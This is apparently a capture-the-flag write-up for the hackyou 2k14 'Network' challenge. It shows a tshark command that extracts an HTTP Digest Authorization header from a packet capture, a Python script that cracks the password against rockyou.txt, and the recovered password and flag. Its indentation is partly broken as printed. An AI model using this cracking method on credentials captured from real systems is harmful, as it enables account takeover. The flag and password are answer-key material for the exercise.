hacktracking: # hackyou 2k14: Network

# tshark -V -r net100.pcap -R "frame.number==3" | grep Authorization | tr ',' '\n'
    Authorization: Digest username="admin"
 realm="Private Area"
 nonce="1389094144"
 uri="/auth.php"
 response="f86930f9e0466aeced34036bc2f7a346"
 opaque="8be5ca4697def50a128600e8f106efd5"
 qop=auth
 nc=00000001
 cnonce="347278e387a2f030"\r\n
# cat network.py
#!/usr/bin/python

from hashlib import md5

url = 'http://54.201.187.163'
username = 'admin'
realm = 'Private Area'
method = 'GET'
uri = '/auth.php'
nonce = '1389094144'
nc = '00000001'
cnonce = '347278e387a2f030'
qop = 'auth'
response = 'f86930f9e0466aeced34036bc2f7a346'

for password in open('rockyou.txt', 'r'):
   password = password.strip()
   ha1 = md5(username + ':' + realm + ':' + password).hexdigest()
   ha2 = md5(method + ':' + uri).hexdigest()
   res = md5(ha1 + ':' + nonce + ':' + nc + ':' + cnonce + ':' + qop + ':' + ha2).hexdigest()
   if res == response:
    print password
    import urllib2
    authhandler = urllib2.HTTPDigestAuthHandler()
    authhandler.add_password(realm, url + uri, username, password)
    opener = urllib2.build_opener(authhandler)
    urllib2.install_opener(opener)
    res = urllib2.urlopen(url + uri)
            print res.read()
    break
# ./network.py
cowboy123
CTF{6ee8014f5cc43767d03d97d6d73d9ed5}
hacktracking

# hackyou 2k14: Network - PCAP (100 points)

No comments:
